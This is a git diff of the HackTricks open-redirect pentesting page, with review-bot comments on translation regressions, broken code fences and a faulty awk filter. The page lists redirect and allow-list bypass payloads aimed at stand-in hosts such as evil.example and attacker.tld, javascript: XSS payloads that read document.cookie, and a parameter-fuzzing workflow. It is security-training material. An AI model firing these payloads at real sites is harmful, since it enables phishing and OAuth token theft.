mirror of https://github.com/HackTricks-wiki/hacktricks.git (synced 2025-10-10 18:36:50 +00:00)
Translated ['src/pentesting-web/open-redirect.md'] to es
parent 89b3c7d386
commit 8c441ed615
@ -1,18 +1,29 @@
# Redirección Abierta
# Open Redirect

{{#include ../banners/hacktricks-training.md}}


## Redirección Abierta
## Open redirect

### Redirección a localhost o dominios arbitrarios
### Redirect to localhost or arbitrary domains

- Si la app “allows only internal/whitelisted hosts”, prueba notaciones alternativas de host para alcanzar loopback o rangos internos vía el redirect target:
- IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
- IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
- Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
- Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Estos son útiles cuando solo se permiten “subdomains of X” pero la resolución del host sigue apuntando a 127.0.0.1.
- Network-path references often bypass naive validators that prepend a scheme or only check prefixes:
- //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme.
- Userinfo tricks defeat contains/startswith checks against trusted hosts:
- https://trusted.tld@attacker.tld/ → el navegador navega a attacker.tld pero simples comprobaciones de cadena “ven” trusted.tld.
- Backslash parsing confusion between frameworks/browsers:
- https://trusted.tld\@attacker.tld → algunos backends tratan “\” como un caracter de path y pasan la validación; browsers normalizan a “/” e interpretan trusted.tld como userinfo, enviando usuarios a attacker.tld. Esto también aparece en mismatches de Node/PHP URL-parser.

{{#ref}}
ssrf-server-side-request-forgery/url-format-bypass.md
{{#endref}}

### Redirección Abierta a XSS
### Modern open-redirect to XSS pivots
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
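Review bot: this hunk deletes the Spanish headings (`# Redirección Abierta`, `## Redirección Abierta`, `### Redirección a localhost o dominios arbitrarios`, `### Redirección Abierta a XSS`) and replaces them with English ones, and most of the new bullet text ("IPv4 loopback variants", "Network-path references often bypass naive validators", "Userinfo tricks defeat contains/startswith checks") is left untranslated, so a commit whose message says it translates the file to es makes the page mostly English; keep the Spanish headings and translate the bullets. One scoping sentence would also help in the loopback bullet: a browser that is redirected to 127.0.0.1, 2130706433 or 127.0.0.1.sslip.io ends up on the victim's own machine, so those variants matter when the server follows the redirect itself (SSRF, the linked url-format-bypass page) or when the goal is to prove an allow-list bypass, whereas the userinfo (`https://trusted.tld@attacker.tld/`) and backslash (`https://trusted.tld\@attacker.tld`) entries are the ones that actually send a browser off-site.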
@ -58,7 +69,36 @@ javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
## Open Redirect subiendo archivos svg
<details>
<summary>Payloads modernos de bypass basados en URL</summary>
```text
# Scheme-relative (current scheme is reused)
//evil.example

# Credentials (userinfo) trick
https://trusted.example@evil.example/

# Backslash confusion (server validates, browser normalizes)
https://trusted.example\@evil.example/

# Schemeless with whitespace/control chars
evil.example%00
%09//evil.example

# Prefix/suffix matching flaws
https://trusted.example.evil.example/
https://evil.example/trusted.example

# When only path is accepted, try breaking absolute URL detection
/\\evil.example
/..//evil.example
```

```
</details>

## Open Redirect uploading svg files

```html
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
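Review bot: the bare ``` between the closing fence of the ```text payload list and `</details>` is unbalanced: it opens a new fenced block that nothing closes (the following ```html line carries an info string, so CommonMark treats it as content rather than as a closing fence), which swallows `</details>`, the `## Open Redirect uploading svg files` heading and the start of the SVG example into one code block; delete that line. The heading change `## Open Redirect subiendo archivos svg` → `## Open Redirect uploading svg files` is another untranslated replacement in a translate-to-es commit. The `<code>` wrapper inside the ```html fence is redundant (the fence already renders verbatim) and will appear as literal text; drop `<code>` and its closing tag.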
@ -68,7 +108,9 @@ xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```
## Parámetros de inyección comunes

## Common injection parameters

```
/{payload}
?next={payload}
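Review bot: `## Parámetros de inyección comunes` is replaced by the English `## Common injection parameters` here, the same regression as the earlier headings; keep the Spanish one. Minor: the `</code>` that closes the SVG example sits inside a ```html fence, where the HTML wrapper is unnecessary and renders as literal `</code>` text; remove it together with its opening tag.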
@ -143,17 +185,23 @@ RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
## Ejemplos de código

## Code examples

#### .Net

```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```

#### Java

```bash
response.redirect("http://mysafedomain.com");
```

#### PHP

```php
<?php
/* browser redirections*/
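Review bot: `## Ejemplos de código` is dropped for `## Code examples`, again untranslated. Separately, the .Net and Java snippets are fenced as ```bash although they are C# and Java; tag them `csharp` and `java` so the highlighter does not treat them as shell. Since the point of these snippets is that a hard-coded destination (`~/mysafe-subdomain/login.aspx`, `http://mysafedomain.com`) is the safe form, a one-line comment saying so would make the contrast with the `?next={payload}` parameters listed above explicit.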
@ -161,16 +209,75 @@ header("Location: http://mysafedomain.com");
exit;
?>
```

## Hunting and exploitation workflow (practical)

- Single URL check with curl:

```bash
curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
```

- Discover and fuzz likely parameters at scale:

<details>
<summary>Click to expand</summary>

```bash
# 1) Recopila URLs históricas, conserva aquellas con parámetros comunes de redirección
cat domains.txt \
| gau --o urls.txt # or: waybackurls / katana / hakrawler

# 2) Grep parámetros comunes y normaliza la lista
rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
| sed 's/\r$//' | sort -u > candidates.txt

# 3) Usa OpenRedireX para fuzz con un corpus de payloads
cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt

# 4) Verifica manualmente los resultados interesantes
awk '/30[1237]|Location:/I' results.txt
```
```
</details>

- No olvides los sinks del lado cliente en SPAs: busca window.location/assign/replace y los helpers del framework que leen query/hash y redirigen.

- Los frameworks a menudo introducen footguns cuando los destinos de redirección se derivan de input no confiable (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input.

{{#ref}}
../network-services-pentesting/pentesting-web/nextjs.md
{{#endref}}

- OAuth/OIDC flows: abusar de open redirectors frecuentemente escala a account takeover por leaking de authorization codes/tokens. Consulta la guía dedicada:

{{#ref}}
./oauth-to-account-takeover.md
{{#endref}}

- Las respuestas del servidor que implementan redirects sin Location (meta refresh/JavaScript) siguen siendo explotables para phishing y a veces pueden encadenarse. Grep for:
```html
<meta http-equiv="refresh" content="0;url=//evil.example">
<script>location = new URLSearchParams(location.search).get('next')</script>
```
## Herramientas

- [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
- OpenRedireX – fuzzer para detectar open redirects. Ejemplo:
```bash
# Install
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh

## Recursos
# Fuzz a list of candidate URLs (use FUZZ as placeholder)
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
```
## Referencias

- En [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) puedes encontrar listas de fuzzing.
- En https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect puedes encontrar listas de fuzzing.
- [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
- [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
- [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)

- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
- OpenRedireX – Un fuzzer para detectar open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX

{{#include ../banners/hacktricks-training.md}}
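Review bot: the extra ``` right after the closing fence of the workflow script (the line before `</details>`) is unbalanced: it opens a fenced block that runs until the ``` closing the meta-refresh/`<script>` snippet, so `</details>`, the SPA-sink bullet, the Next.js and OAuth `{{#ref}}` blocks and the `Grep for:` bullet all render as code; delete that line (same defect as in the `<details>` payload list earlier in this diff). In the script itself, `awk '/30[1237]|Location:/I' results.txt` does not do what the comment says: awk has no `/re/I` case-insensitive modifier, the trailing `I` is read as an (uninitialised) variable concatenated to the match result, and the resulting non-empty string ("0" or "1") is true for every line, so the filter passes everything; use `grep -iE '30[1237]|Location:' results.txt` or `awk 'tolower($0) ~ /location:/ || /30[1237]/' results.txt`. The single-URL probe uses `curl -I` (HEAD); redirect handlers that only answer GET will not show a `Location:` header to it, so `curl -s -o /dev/null -D - "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"` is the safer check. The hunk also leaves `## Hunting and exploitation workflow (practical)`, `- Single URL check with curl:`, `- Discover and fuzz likely parameters at scale:` and `Grep for:` in English, and the PayloadsAllTheThings entry that replaces the deleted one loses its Markdown link.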